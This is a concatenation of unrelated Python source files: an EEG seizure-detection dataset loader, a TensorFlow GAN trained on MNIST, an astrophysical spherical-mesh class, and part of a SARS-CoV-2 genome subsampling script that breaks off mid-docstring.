self.graph_type = graph_type
self.top_k = top_k
self.filter_type = filter_type
self.use_fft = use_fft
self.preproc_dir = preproc_dir
# get full paths to all raw edf files
self.edf_files = []
for path, subdirs, files in os.walk(raw_data_dir):
for name in files:
if ".edf" in name:
self.edf_files.append(os.path.join(path, name))
file_marker_dir = os.path.join(
FILEMARKER_DIR,
split +
'Set_seq2seq_' +
str(input_len) +
's.txt')
with open(file_marker_dir, 'r') as f:
f_str = f.readlines()
self.file_tuples = [f_str[i].strip('\n').split(',') for i in range(len(f_str))]
self.size = len(self.file_tuples)
# get sensor ids
self.sensor_ids = [x.split(' ')[-1] for x in INCLUDED_CHANNELS]
def __len__(self):
return self.size
def _random_reflect(self, EEG_seq, reflect=False):
"""
Randomly reflect EEG channels along the midline
"""
swap_pairs = get_swap_pairs(INCLUDED_CHANNELS)
EEG_seq_reflect = EEG_seq.copy()
if reflect:
for pair in swap_pairs:
EEG_seq_reflect[:,[pair[0],pair[1]],:] = EEG_seq[:,[pair[1], pair[0]],:]
else:
swap_pairs = None
return EEG_seq_reflect, swap_pairs
def _random_scale(self, EEG_seq, scale_factor=None):
"""
Scale EEG signals by a random number between 0.8 and 1.2
"""
if scale_factor is None:
scale_factor = np.random.uniform(0.8, 1.2)
if self.use_fft:
EEG_seq += np.log(scale_factor)
else:
EEG_seq *= scale_factor
return EEG_seq
def _get_indiv_graphs(self, eeg_clip, swap_nodes=None):
"""
Compute adjacency matrix for correlation graph
Args:
eeg_clip: shape (seq_len, num_nodes, input_dim)
swap_nodes: list of swapped node index
Returns:
adj_mat: adjacency matrix, shape (num_nodes, num_nodes)
"""
num_sensors = len(self.sensor_ids)
adj_mat = np.eye(num_sensors, num_sensors,
dtype=np.float32) # diagonal is 1
# (num_nodes, seq_len, input_dim)
eeg_clip = np.transpose(eeg_clip, (1, 0, 2))
assert eeg_clip.shape[0] == num_sensors
# (num_nodes, seq_len*input_dim)
eeg_clip = eeg_clip.reshape((num_sensors, -1))
sensor_id_to_ind = {}
for i, sensor_id in enumerate(self.sensor_ids):
sensor_id_to_ind[sensor_id] = i
if swap_nodes is not None:
for node_pair in swap_nodes:
node_name0 = [
key for key,
val in sensor_id_to_ind.items() if val == node_pair[0]][0]
node_name1 = [
key for key,
val in sensor_id_to_ind.items() if val == node_pair[1]][0]
sensor_id_to_ind[node_name0] = node_pair[1]
sensor_id_to_ind[node_name1] = node_pair[0]
for i in range(0, num_sensors):
for j in range(i + 1, num_sensors):
xcorr = comp_xcorr(
eeg_clip[i, :], eeg_clip[j, :], mode='valid', normalize=True)
adj_mat[i, j] = xcorr
adj_mat[j, i] = xcorr
adj_mat = abs(adj_mat)
if (self.top_k is not None):
adj_mat = keep_topk(adj_mat, top_k=self.top_k, directed=True)
else:
raise ValueError('Invalid top_k value!')
return adj_mat
def _get_combined_graph(self, swap_nodes=None):
"""
Get adjacency matrix for pre-computed distance graph
Returns:
adj_mat_new: adjacency matrix, shape (num_nodes, num_nodes)
"""
with open(self.adj_mat_dir, 'rb') as pf:
adj_mat = pickle.load(pf)
adj_mat = adj_mat[-1]
adj_mat_new = adj_mat.copy()
if swap_nodes is not None:
for node_pair in swap_nodes:
for i in range(adj_mat.shape[0]):
adj_mat_new[node_pair[0], i] = adj_mat[node_pair[1], i]
adj_mat_new[node_pair[1], i] = adj_mat[node_pair[0], i]
adj_mat_new[i, node_pair[0]] = adj_mat[i, node_pair[1]]
adj_mat_new[i, node_pair[1]] = adj_mat[i, node_pair[0]]
adj_mat_new[i, i] = 1
adj_mat_new[node_pair[0], node_pair[1]
] = adj_mat[node_pair[1], node_pair[0]]
adj_mat_new[node_pair[1], node_pair[0]
] = adj_mat[node_pair[0], node_pair[1]]
return adj_mat_new
def _compute_supports(self, adj_mat):
"""
Comput supports
"""
supports = []
supports_mat = []
if self.filter_type == "laplacian": # ChebNet graph conv
supports_mat.append(
utils.calculate_scaled_laplacian(adj_mat, lambda_max=None))
elif self.filter_type == "random_walk": # Forward random walk
supports_mat.append(utils.calculate_random_walk_matrix(adj_mat).T)
elif self.filter_type == "dual_random_walk": # Bidirectional random walk
supports_mat.append(utils.calculate_random_walk_matrix(adj_mat).T)
supports_mat.append(
utils.calculate_random_walk_matrix(adj_mat.T).T)
else:
supports_mat.append(utils.calculate_scaled_laplacian(adj_mat))
for support in supports_mat:
supports.append(torch.FloatTensor(support.toarray()))
return supports
def __getitem__(self, idx):
"""
Args:
idx: (int) index in [0, 1, ..., size_of_dataset-1]
Returns:
a tuple of (x, y, seq_len, supports, adj_mat, writeout_fn)
"""
h5_fn_x, h5_fn_y = self.file_tuples[idx]
edf_fn = h5_fn_x.split('.edf')[0] + '.edf'
clip_idx_x = int(h5_fn_x.split('_')[-1].split('.h5')[0])
clip_idx_y = int(h5_fn_y.split('_')[-1].split('.h5')[0])
edf_file = [file for file in self.edf_files if edf_fn in file]
assert len(edf_file) == 1
edf_file = edf_file[0]
# preprocess
if self.preproc_dir is None:
resample_sig_dir = os.path.join(
self.input_dir, h5_fn_x.split('.edf')[0] + '.h5')
eeg_clip_x = computeSliceMatrix(
h5_fn=resample_sig_dir, edf_fn=edf_file, clip_idx=clip_idx_x,
time_step_size=self.time_step_size, clip_len=self.input_len,
is_fft=self.use_fft)
eeg_clip_y = computeSliceMatrix(
h5_fn=resample_sig_dir, edf_fn=edf_file, clip_idx=clip_idx_y,
time_step_size=self.time_step_size, clip_len=self.input_len,
is_fft=self.use_fft)
else:
with h5py.File(os.path.join(self.preproc_dir, h5_fn_x), 'r') as hf:
eeg_clip_x = hf['clip'][()]
with h5py.File(os.path.join(self.preproc_dir, h5_fn_y), 'r') as hf:
eeg_clip_y = hf['clip'][()]
# data augmentation
if self.data_augment:
# reflect or not reflect for both x and y
reflect = np.random.choice([True, False])
x_feature, swap_nodes = self._random_reflect(eeg_clip_x, reflect=reflect)
y_feature, _ = self._random_reflect(eeg_clip_y, reflect=reflect)
# scale by the same factor for both x and y
scale_factor = np.random.uniform(0.8, 1.2)
x_feature = self._random_scale(x_feature, scale_factor=scale_factor)
y_feature = self._random_scale(y_feature, scale_factor=scale_factor)
else:
swap_nodes = None
x_feature = eeg_clip_x.copy()
y_feature = eeg_clip_y.copy()
# standardize wrt train mean and std
if self.standardize:
x_feature = self.scaler.transform(x_feature)
y_feature = self.scaler.transform(y_feature)
# convert to tensors
# (max_seq_len, num_nodes, input_dim)
x = torch.FloatTensor(x_feature)
y = torch.FloatTensor(y_feature[:self.output_len,:,:])
assert x.shape[0] == self.input_len
assert y.shape[0] == self.output_len
seq_len = torch.LongTensor([self.input_len])
writeout_fn = h5_fn_x.split('.h5')[0]
# get adjacency matrix for graphs
if self.graph_type == 'individual':
indiv_adj_mat = self._get_indiv_graphs(eeg_clip_x, swap_nodes)
indiv_supports = self._compute_supports(indiv_adj_mat)
curr_support = np.concatenate(indiv_supports, axis=0)
if np.any(np.isnan(curr_support)):
raise ValueError("Nan found in indiv_supports!")
elif self.adj_mat_dir is not None:
indiv_adj_mat = self._get_combined_graph(swap_nodes)
indiv_supports = self._compute_supports(indiv_adj_mat)
else:
indiv_supports = []
indiv_adj_mat = []
return (x, y, seq_len, indiv_supports, indiv_adj_mat, writeout_fn)
def load_dataset_ssl(
input_dir,
raw_data_dir,
train_batch_size,
test_batch_size,
time_step_size=1,
input_len=60,
output_len=12,
standardize=True,
num_workers=8,
augmentation=False,
adj_mat_dir=None,
graph_type=None,
top_k=None,
filter_type='laplacian',
use_fft=False,
preproc_dir=None):
"""
Args:
input_dir: dir to resampled signals h5 file
raw_data_dir: dir to TUSZ raw edf files
train_batch_size: int
test_batch_size: int
time_step_size: int, in seconds
input_len: int, input clip length, in seconds
output_len: int, output clip length, in seconds
standardize: if True, will z-normalize wrt train set
num_workers: int
augmentation: if True, perform random augmentation of EEG seq
adj_mat_dir: dir to pre-computed distance graph adjacency matrix
graph_type: 'combined' (i.e. distance graph) or 'individual' (correlation graph)
top_k: int, top-k neighbors of each node to keep. For correlation graph only
filter_type: 'laplacian' for distance graph, 'dual_random_walk' for correlation graph
use_fft: whether perform Fourier transform
preproc_dir: dir to preprocessed Fourier transformed data, optional
Returns:
dataloaders: dictionary of train/dev/test dataloaders
datasets: dictionary of train/dev/test datasets
scaler: standard scaler
"""
if (graph_type is not None) and (
graph_type not in ['individual', 'combined']):
raise NotImplementedError
# load per-node mean and std
if standardize:
means_dir = os.path.join(
FILEMARKER_DIR, 'means_seq2seq_fft_'+str(input_len)+'s_single.pkl')
stds_dir = os.path.join(
FILEMARKER_DIR, 'stds_seq2seq_fft_'+str(input_len)+'s_single.pkl')
with open(means_dir, 'rb') as f:
means = pickle.load(f)
with open(stds_dir, 'rb') as f:
stds = pickle.load(f)
scaler = StandardScaler(mean=means, std=stds)
else:
scaler = None
dataloaders = {}
datasets = {}
for split in ['train', 'dev', 'test']:
if split == 'train':
data_augment = augmentation
else:
data_augment = False # no augmentation on dev/test sets
dataset = SeizureDataset(input_dir=input_dir,
raw_data_dir=raw_data_dir,
time_step_size=time_step_size,
input_len=input_len,
output_len=output_len,
standardize=standardize,
scaler=scaler,
split=split,
data_augment=data_augment,
adj_mat_dir=adj_mat_dir,
graph_type=graph_type,
top_k=top_k,
filter_type=filter_type,
use_fft=use_fft,
preproc_dir=preproc_dir)
if split == 'train':
shuffle = True
batch_size = train_batch_size
else:
shuffle = False
batch_size = test_batch_size
loader = DataLoader(dataset=dataset,
shuffle=shuffle,
batch_size=batch_size,
num_workers=num_workers)
dataloaders[split] = loader
datasets[split] = dataset
return dataloaders, datasets, scaler
|
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from tensorflow.keras.layers import Dense, Flatten, Conv2D, Conv2DTranspose, \
Reshape, BatchNormalization, LeakyReLU, Dropout
from tensorflow.keras import Model
LATENT_DIM = 100
NUM_EPOCHS = 50
BATCH_SIZE = 256
LEARNING_RATE = 1e-4
d_train_loss = tf.keras.metrics.Mean(name='disc_train_loss')
g_train_accuracy = tf.keras.metrics.BinaryAccuracy(name='gen_train_accuracy')
g_train_loss = tf.keras.metrics.Mean(name='gen_train_loss')
disc_optimizer = tf.keras.optimizers.Adam(LEARNING_RATE)
gen_optimizer = tf.keras.optimizers.Adam(LEARNING_RATE)
loss_cross_entropy = tf.keras.losses.BinaryCrossentropy(from_logits=True)
def loss_discriminator_obj(real, fake):
real_loss = loss_cross_entropy(tf.ones_like(real), real)
fake_loss = loss_cross_entropy(tf.zeros_like(fake), fake)
return real_loss + fake_loss
def loss_generator_obj(fake):
return loss_cross_entropy(tf.ones_like(fake), fake)
class GANDiscriminator(Model):
def __init__(self):
super(GANDiscriminator, self).__init__()
self.conv1 = Conv2D(64, 5, activation=tf.nn.leaky_relu, strides=2,
padding='SAME', input_shape=(28, 28, 1))
self.dropout1 = Dropout(0.3)
self.conv2 = Conv2D(128, 5, activation=tf.nn.leaky_relu, strides=2,
padding='SAME')
self.dropout2 = Dropout(0.3)
self.flatten = Flatten()
self.d1 = Dense(1)
def call(self, x):
x = self.conv1(x)
x = self.dropout1(x)
x = self.conv2(x)
x = self.dropout2(x)
x = self.flatten(x)
return self.d1(x)
class GANGenerator(Model):
def __init__(self, latent_dim):
super(GANGenerator, self).__init__()
self.d1 = Dense(7 * 7 * 256, input_dim=latent_dim, use_bias=False)
self.bn1 = BatchNormalization()
self.leaky_relu1 = tf.keras.layers.LeakyReLU()
self.resh = Reshape((7, 7, 256))
self.conv1t = Conv2DTranspose(128, 5, strides=1,
padding='SAME', input_shape=(7, 7, 256), use_bias=False)
self.bn2 = BatchNormalization()
self.leaky_relu2 = tf.keras.layers.LeakyReLU()
self.conv2t = Conv2DTranspose(64, 5, strides=2,
padding='SAME', input_shape=(7, 7, 128), use_bias=False)
self.bn3 = BatchNormalization()
self.leaky_relu3 = tf.keras.layers.LeakyReLU()
self.conv3t = Conv2DTranspose(1, 5, strides=2,
activation='tanh',
padding='SAME', input_shape=(14, 14, 64), use_bias=False)
def call(self, x):
x = self.d1(x)
x = self.bn1(x)
x = self.leaky_relu1(x)
x = self.resh(x)
x = self.conv1t(x)
x = self.bn2(x)
x = self.leaky_relu2(x)
x = self.conv2t(x)
x = self.bn3(x)
x = self.leaky_relu3(x)
return self.conv3t(x)
def get_train_step_gan(batch_size, latent_dim):
""" Wrapper for training step, needed if running more than one model
per run
:return: train step function
"""
@tf.function
def train_step(generator, discriminator, im_batch):
noise = sample_Z(batch_size, latent_dim)
with tf.GradientTape() as gan_grad_tape:
with tf.GradientTape() as disc_grad_tape:
gen_images = generator(noise, training=True)
preds_real = discriminator(im_batch, training=True)
preds_fake = discriminator(gen_images, training=True)
loss_gen = loss_generator_obj(preds_fake)
loss_disc = loss_discriminator_obj(preds_real, preds_fake)
disc_grads = disc_grad_tape.gradient(loss_disc,
discriminator.trainable_variables)
disc_optimizer.apply_gradients(zip(disc_grads,
discriminator.trainable_variables))
gen_grads = gan_grad_tape.gradient(loss_gen, generator.trainable_variables)
gen_optimizer.apply_gradients(zip(gen_grads, generator.trainable_variables))
d_train_loss(loss_disc)
g_train_loss(loss_gen)
g_train_accuracy(tf.ones_like(preds_fake), preds_fake)
return train_step
def sample_Z(batch_size, latent_dim):
return tf.random.normal([batch_size, latent_dim])
def train(generator, discriminator, images, latent_dim, num_epochs, batch_size):
""" Trains a model (subclassing tf.keras.Model) over MNIST data collection
:param load_data:
:param use_full_train_set:
:param Model model: Model to train, whose __call__() function accepts a
batch of 28x28 greyscale images and returns a 10-class logits
:param int num_epochs: Number of epochs to train with
:param int batch_size: Batch size
:param train_metric: either `train_loss` or `train_accuracy`
:param test_metric: either `test_loss` or `test_accuracy`
:param List metric_scaling_factor: ints [train_metric_scale, test_metric_scale] .
Scales the value outputted by the metric at each measuring point by this value.
:returns List: [train_metric_values, test_metric_values]
"""
sample_noise = sample_Z(16, latent_dim)
shuffle_seed = 60000
train_ds = tf.data.Dataset.from_tensor_slices(images) \
.shuffle(shuffle_seed) \
.batch(batch_size)
train_step = get_train_step_gan(batch_size, latent_dim)
for epoch in range(num_epochs):
for image_batch in train_ds:
train_step(generator, discriminator, image_batch)
print(f'Epoch {epoch + 1} : Disc loss: {d_train_loss.result()}, Gen loss: {g_train_loss.result()}')
# Reset the metrics for the next epoch
d_train_loss.reset_states()
g_train_loss.reset_states()
generated_images_tensor = generator(sample_noise, training=False)
fig = plt.figure(figsize=(4, 4))
for i in range(generated_images_tensor.shape[0]):
plt.subplot(4, 4, i + 1)
plt.imshow(generated_images_tensor[i, :, :, 0] * 127.5 + 127.5, cmap='gray')
plt.axis('off')
plt.show()
|
import numpy as np
import logging
from collections import OrderedDict
import astropy.units as u
logging.basicConfig(format='%(asctime)s: %(message)s', level=logging.INFO)
class SphericalMesh(object):
def __init__(self, **kwargs):
"""
A spherical mesh is initialized with a coordinate grid in (pot, theta, phi).
The initial potential array is dimensionless, to be scaled based on object
type and surface potential computed from structure or provided by user.
Parameters
----------
**kwargs
Can be:
dims: list, np.ndarray
Dimensions of the grid (Npot, Ntheta, Nphi)
atm_range: float
Relative size of the atmosphere with respect to surface potential.
"""
self.__coords = None # required when setting dims and atm_range for the first time
self.dims = kwargs.get('dims', [50,50,50])
self.atm_range = kwargs.get('atm_range', 0.01)
pots = np.linspace(1.,1.+self.atm_range,self.dims[0])
thetas = np.linspace(0., np.pi/2, self.dims[1])*self.default_units['theta']
phis = np.linspace(0., np.pi, self.dims[2])*self.default_units['phi']
self.__coords = OrderedDict([('pots', pots), ('thetas', thetas), ('phis', phis)])
@property
def dims(self):
return self.__dims
@dims.setter
def dims(self, value):
if isinstance(value, (list,np.ndarray)):
value = np.array(value)
if value.shape == (3,):
self.__dims = value
if self.__coords != None:
# recompute coords
pots = self.__coords['pots'][0]*np.linspace(1.,1.+self.atm_range,self.__dims[0])
thetas = np.linspace(0., np.pi/2, self.__dims[1])
phis = np.linspace(0., np.pi, self.__dims[2])
self.__coords = OrderedDict([('pots', pots), ('thetas', thetas), ('phis', phis)])
else:
raise TypeError('Wrong array shape: {}. \
dims parameter array needs to have shape (3,)'.format(value.shape))
else:
raise TypeError('dims parameter needs to be an array of shape (3,).')
@property
def atm_range(self):
return self.__atm_range
@atm_range.setter
def atm_range(self, value):
self.__atm_range = value
if self.__coords != None:
self.__coords['pots'] = self.__coords['pots'][0]*np.linspace(1.,1.+self.__atm_range,self.__dims[0])
@property
def coords(self):
return self.__coords
def _params(self):
"""
Returns
-------
List of updateable parameters.
"""
return [key for key in dir(self) if not key.startswith('_')]
@property
def default_units(self):
return {'r': u.R_sun, 'theta': u.rad, 'phi': u.rad}
class StarSphericalMesh(SphericalMesh):
def __init__(self, starinstance, **kwargs):
super(StarSphericalMesh,self).__init__(**kwargs)
self.__star = starinstance
def _params(self):
"""
Returns
-------
List of updateable parameters.
"""
return [key for key in dir(self) if not key.startswith('_')]
def _compute_point(self, arg):
logging.info('Computing mesh point %s' % arg)
# arg is the argument of the point in mesh
# arg = k + (nphis)*j + (nthetas*npots)*i
# i - positional argument of pot in pots array
# j - postional argument of theta in thetas array
# k - positional argument of phi in thetas array
i = arg / (self.dims[1]*self.dims[2])
jrem = arg % (self.dims[1]*self.dims[2])
j = jrem / self.dims[2]
k = jrem % self.dims[2]
pot = self.coords['pots'][i]
theta = self.coords['thetas'][j]
phi = self.coords['phis'][k]
direction = np.array([np.sin(theta) * np.cos(phi),
np.sin(theta) * np.sin(phi),
np.cos(theta)])
r = self.__star.structure._compute_radius(pot=pot, direction=direction)
n = self.__star.structure._compute_normal(r)
return (arg, r, n)
def _compute(self, parallel=True, **kwargs):
if kwargs:
newparams = set(kwargs.keys()) & set(self._params())
if newparams:
for param in newparams:
setattr(self,param,kwargs[param])
meshsize = self.dims[0]*self.dims[1]*self.dims[2]
if parallel:
import multiprocessing as mp
#######################################
import sys
import types
#Difference between Python3 and 2
if sys.version_info[0] < 3:
import copy_reg as copyreg
else:
import copyreg
def _pickle_method(m):
class_self = m.im_class if m.im_self is None else m.im_self
return getattr, (class_self, m.im_func.func_name)
copyreg.pickle(types.MethodType, _pickle_method)
#######################################
numproc = mp.cpu_count()
print 'Available processors: %s' % numproc
pool = mp.Pool(processes=numproc)
results = pool.map(self._compute_point, range(meshsize))
results.sort()
rsns = np.array([[result[1], result[2]] for result in results])
rs = rsns[:,0]
normals = rsns[:,1]
else:
rs = np.zeros((meshsize, 3))
normals = np.zeros((meshsize, 3))
for arg in range(meshsize):
arg, rs[arg], normals[arg] = self._compute_point(arg)
self.rs = rs * self.__star.structure.scale
self.ns = normals
class ContactBinarySphericalMesh(SphericalMesh):
def __init__(self, starinstance, **kwargs):
super(ContactBinarySphericalMesh,self).__init__(**kwargs)
self.__star = starinstance
|
<reponame>wuaipinglab/covSampler
'''
subsampling
'''
import os
import re
import time
import argparse
import pandas as pd
def get_target_ids(file, args, genome_path):
'''
get accession id of sequences in selected range (location, date and variants)
:param file: str, infos file path
:param args: argparse, args
:param genome_path: str, SARS-CoV-2 genome file path
:return: dict, key: accession id; value: infos of sequences
list, accession id of sequences in selected range
'''
# read infos from infos.tsv
infos = {}
with open(file) as f:
lines = f.readlines()
for line in lines:
if not line.startswith('ID'):
lineList = line.strip().split('\t')
seqID = lineList[0]
seqRegion = lineList[1]
seqCountry = lineList[2]
seqDivision = lineList[3]
seqDate = lineList[4]
seqPL = lineList[5]
seqNC = lineList[6]
seqGC = lineList[7]
seqNT = lineList[8]
seqAA = lineList[9]
infos[seqID] = {
'region': seqRegion,
'country': seqCountry,
'division': seqDivision,
'date': seqDate,
'pangoLineage': seqPL,
'nextstrainClade': seqNC,
'gisaidClade': seqGC,
'nt': seqNT,
'aa': seqAA
}
target_ids = []
# add accession id of sequences in selected location
if args.location == 'Global':
target_ids = list(infos.keys())
elif args.location.count('/') == 0:
for i in infos:
if infos[i]['region'] == args.location:
target_ids.append(i)
elif args.location.count('/') == 1:
for i in infos:
if infos[i]['region'] == args.location.split('/')[0] and infos[i]['country'] == args.location.split('/')[1]:
target_ids.append(i)
elif args.location.count('/') == 2:
for i in infos:
if infos[i]['region'] == args.location.split('/')[0] and infos[i]['country'] == args.location.split('/')[1] and infos[i]['division'] == args.location.split('/')[2]:
target_ids.append(i)
# remove accession id of sequences not in selected date range
dropDate = []
for i in target_ids:
if not args.dateStart <= infos[i]['date'] <= args.dateEnd:
dropDate.append(i)
target_ids = list(set(target_ids)-set(dropDate))
# remove accession id of sequences not belong to selected variant(s)
if args.variants is not None:
for variant in args.variants:
dropVariant = []
# lineage
if variant.startswith('Lineage'):
# VOC or VOI (example: Lineage/WHO/Alpha)
if variant.split('/')[1] == 'WHO':
PANGO_WHO = {
'B.1.1.7': 'Alpha',
'Q': 'Alpha',
'B.1.351': 'Beta',
'P.1': 'Gamma',
'B.1.617.2': 'Delta',
'AY': 'Delta',
'B.1.1.529': 'Omicron',
'BA': 'Omicron',
'C.37': 'Lambda',
'B.1.621': 'Mu'
}
for i in target_ids:
isVar = False
for l in PANGO_WHO:
if infos[i]['pangoLineage'] == l or infos[i]['pangoLineage'].startswith(l+'.'):
lWHO = PANGO_WHO[l]
if lWHO == variant.split('/')[2]:
isVar = True
if not isVar:
dropVariant.append(i)
# pango lineage (example: Lineage/Pango_lineage/B.1.1.7)
elif variant.split('/')[1] == 'Pango_lineage':
for i in target_ids:
if infos[i]['pangoLineage'] != variant.split('/')[2]:
dropVariant.append(i)
# nextstrain clade (example: Lineage/Nextstrain_clade/20I (Alpha, V1))
elif variant.split('/')[1] == 'Nextstrain_clade':
for i in target_ids:
if infos[i]['nextstrainClade'] != variant.split('/')[2]:
dropVariant.append(i)
# gisaid clade (example: Lineage/Gisaid_clade/G)
elif variant.split('/')[1] == 'Gisaid_clade':
for i in target_ids:
if infos[i]['gisaidClade'] != variant.split('/')[2]:
dropVariant.append(i)
# site
elif variant.startswith('Site'):
genome = pd.read_csv(genome_path, index_col=0)
# nucleotide site
if variant.split('/')[1] == 'Nucleotide':
genomePos = int(variant.split('/')[2][:-1])
ref = genome[genome['genomePos'] == genomePos]['nucleotide'].values[0]
# ref (example: Site/Nucleotide/23403A)
if variant.split('/')[2][-1] == ref:
for i in target_ids:
if re.search('[^0-9]'+str(genomePos)+'[^0-9]', infos[i]['nt']):
dropVariant.append(i)
# substitution (example: Site/Nucleotide/23403G)
else:
for i in target_ids:
if not re.search('[^0-9]'+variant.split('/')[2], infos[i]['nt']):
dropVariant.append(i)
# amino acid site
elif variant.split('/')[1] == 'Amino_acid':
product = variant.split('/')[2].split('_')[0]
if not (variant.split('/')[2].endswith('del') or variant.split('/')[2].endswith('stop')):
aaPos = int(variant.split('/')[2].split('_')[1][:-1])
ref = genome[(genome['product'] == product) & (genome['aaPos'] == aaPos)]['aa'].values[0]
# ref (example: Site/Amino_acid/Spike_614D)
if variant.split('/')[2][-1] == ref:
for i in target_ids:
if re.search(product+'_'+ref+str(aaPos)+'[^0-9]', infos[i]['aa']):
dropVariant.append(i)
# substitution (example: Site/Amino_acid/Spike_614G)
else:
for i in target_ids:
if product+'_'+ref+variant.split('/')[2].split('_')[1] not in infos[i]['aa']:
dropVariant.append(i)
else:
# deletion (example: Site/Amino_acid/Spike_69del)
if variant.split('/')[2].endswith('del'):
aaPos = int(variant.split('/')[2].split('_')[1][:-3])
# stop (example: Site/Amino_acid/NS8_Q27stop)
elif variant.split('/')[2].endswith('stop'):
aaPos = int(variant.split('/')[2].split('_')[1][:-4])
ref = genome[(genome['product'] == product) & (genome['aaPos'] == aaPos)]['aa'].values[0]
for i in target_ids:
if product+'_'+ref+variant.split('/')[2].split('_')[1] not in infos[i]['aa']:
dropVariant.append(i)
target_ids = list(set(target_ids)-set(dropVariant))
target_ids = sorted(target_ids, key=lambda x:int(x.split('_')[2]))
return infos, target_ids
def read_haplotype_sequence(file, target_ids):
'''
read haplotype sequences (constructed by combining pre-calculated SARS-CoV-2
key sites) of sequences in selected range from haplotype_sequence.txt
:param file: str, haplotype sequence file path
:param target_ids: list, accession id of sequences in selected range
:return: dict, key: accession id; value: snps at key sites
'''
all_seqs = {}
seqs = {}
with open(file) as f:
lines = f.readlines()
for line in lines:
if line.strip().split(':')[1] == '':
all_seqs[line.split(':')[0]] = ' '
else:
all_seqs[line.split(':')[0]] = line.strip().split(':')[1]
for i in target_ids:
seqs[i] = all_seqs[i]
return seqs
def read_path(file, target_ids, infos):
'''
read divergent pathways of sequences in selected range from divergent_pathway.csv
divide divergent pathways by continent
:param file: str, divergent pathways file path
:param target_ids: list, accession id of sequences in selected range
:param infos: dict, key: accession id; value: infos of sequences
:return: dict, key: continent; value: divergent pathways
'''
paths_in_continent = {}
seq_path = {}
target_seq_path = {}
target_path = {}
with open(file) as f:
lines = f.readlines()
for line in lines:
if line.startswith('EPI_ISL'):
seq_path[line.split(',')[0]] = line.strip().split(',')[1]
for i in target_ids:
target_seq_path[i] = seq_path[i]
for i in target_seq_path:
target_path.setdefault(target_seq_path[i], []).append(i)
for p in list(target_path.values()):
continent = infos[p[0]]['region']
paths_in_continent.setdefault(continent, []).append(p)
for c in paths_in_continent:
paths_in_continent[c] = sorted(paths_in_continent[c], key=lambda x: len(x), reverse=True)
return paths_in_continent
def calculate_continent_sample_number(required_sample_num, seqs, infos):
'''
distribute the number of subsamples to each continent
:param required_sample_num: int, number of subsamples
:param seqs: dict, key: accession id; value: snps at key sites
:param infos: dict, key: accession id; value: infos of sequences
:return: dict, key: continent; value: number of subsamples in the continent
'''
s = required_sample_num
continent_genome_num = {}
for i in seqs:
continent = infos[i]['region']
continent_genome_num[continent] = continent_genome_num.get(continent, 0) + 1
continent_genome_num = dict(sorted(continent_genome_num.items(), key=lambda x: x[1], reverse=True))
continent_sample_number = {}
for i in continent_genome_num:
continent_sample_number[i] = 0
while s > 0:
for i in continent_sample_number:
if s == 0:
break
if continent_sample_number[i] < continent_genome_num[i]:
continent_sample_number[i] += 1
s -= 1
return continent_sample_number
def com_sampling(required_sample_num, seqs, infos, paths_in_continent):
'''
comprehensive subsampling
:param required_sample_num: int, number of subsamples
:param seqs: dict, key: accession id; value: snps at key sites
:param infos: dict, key: accession id; value: infos of sequences
:param paths_in_continent: dict, key: continent; value: divergent pathways
:return: list, accession id of subsamples
'''
continent_sample_number = calculate_continent_sample_number(required_sample_num, seqs, infos)
com_samples = []
# sampling in each continent
for continent in paths_in_continent:
sample_number_in_continent = continent_sample_number[continent]
# distribute the number of subsamples (in the continent) to each divergent pathways
sample_number_in_paths = []
for i in range(0, len(paths_in_continent[continent])):
sample_number_in_paths.append(0)
while sample_number_in_continent > 0:
for i in range(0, len(sample_number_in_paths)):
if sample_number_in_continent == 0:
break
if sample_number_in_paths[i] < len(paths_in_continent[continent][i]):
sample_number_in_paths[i] += 1
sample_number_in_continent -= 1
# sampling in each divergent pathway
for i in range(0, len(paths_in_continent[continent])):
path = paths_in_continent[continent][i]
# distribute the number of subsamples (in the divergent pathway) to each month
seq_in_months = {}
for seq_id in path:
month = infos[seq_id]['date'][:7]
seq_in_months.setdefault(month, []).append(seq_id)
seq_in_months = dict(sorted(seq_in_months.items(), key=lambda x: x[0], reverse=True))
sample_number_in_path = sample_number_in_paths[i]
sample_number_in_months = {}
for m in seq_in_months:
sample_number_in_months[m] = 0
while sample_number_in_path > 0:
for m in seq_in_months:
if sample_number_in_path == 0:
break
if sample_number_in_months[m] < len(seq_in_months[m]):
sample_number_in_months[m] += 1
sample_number_in_path -= 1
# sampling in each month
for m in seq_in_months:
seq_in_month = seq_in_months[m]
# distribute the number of subsamples (in the month) to each haplotype
seq_in_haplotype_sequences = {}
for seq_id in seq_in_month:
haplotype_sequence = seqs[seq_id]
seq_in_haplotype_sequences.setdefault(haplotype_sequence, []).append(seq_id)
seq_in_haplotype_sequences = dict(sorted(seq_in_haplotype_sequences.items(),
key=lambda x: len(x[0].split(',')), reverse=True))
sample_number_in_month = sample_number_in_months[m]
sample_number_in_haplotype_sequences = {}
for v in seq_in_haplotype_sequences:
sample_number_in_haplotype_sequences[v] = 0
while sample_number_in_month > 0:
for v in seq_in_haplotype_sequences:
if sample_number_in_month == 0:
break
if sample_number_in_haplotype_sequences[v] < len(seq_in_haplotype_sequences[v]):
sample_number_in_haplotype_sequences[v] += 1
sample_number_in_month -= 1
# sampling in each haplotype
for v in seq_in_haplotype_sequences:
seq_in_haplotype_sequence = seq_in_haplotype_sequences[v]
sample_number_in_haplotype_sequence = sample_number_in_haplotype_sequences[v]
seq_in_haplotype_sequence = list(sorted(seq_in_haplotype_sequence,
key=lambda x: int(x.split('_')[2]), reverse=True))
com_samples.extend(seq_in_haplotype_sequence[:sample_number_in_haplotype_sequence])
com_samples = sorted(com_samples, key=lambda x: int(x.split('_')[2]))
return com_samples
def calculate_continent_genome_num_proportion(seqs, infos):
'''
calculate the proportion and number of sequences in each continent
:param seqs: dict, key: accession id; value: snps at key sites
:param infos: dict, key: accession id; value: infos of sequences
:return: dict, key: continent; value: proportion and number of sequences in the continent
'''
continent_genome_num = {}
for i in seqs:
continent = infos[i]['region']
continent_genome_num[continent] = continent_genome_num.get(continent, 0) + 1
continent_genome_num_proportion = {}
for i in continent_genome_num:
continent_genome_num_proportion[i] = {'proportion': continent_genome_num[i] / len(seqs), 'count': continent_genome_num[i]}
return continent_genome_num_proportion
def calculate_continent_threshold(required_sample_num, continent_genome_num_proportion, paths_in_continent):
'''
1. distribute the number of subsamples to each continent
-> make sure the proportion of subsamples in each continent is
consistent with the proportion of sequences in selected range
in each continent
2. calculate the threshold of each continent
in each continent,
-> the number of subsamples in each divergent pathway = the number of
all sequences in seleted range in the divergent pathway / threshold
-> the threshold starts with 0 and increments by 1,
until the number of subsamples in all divergent pathways <= the
number of subsamples in the continent (distributed in step 1)
:param required_sample_num: int, number of subsamples
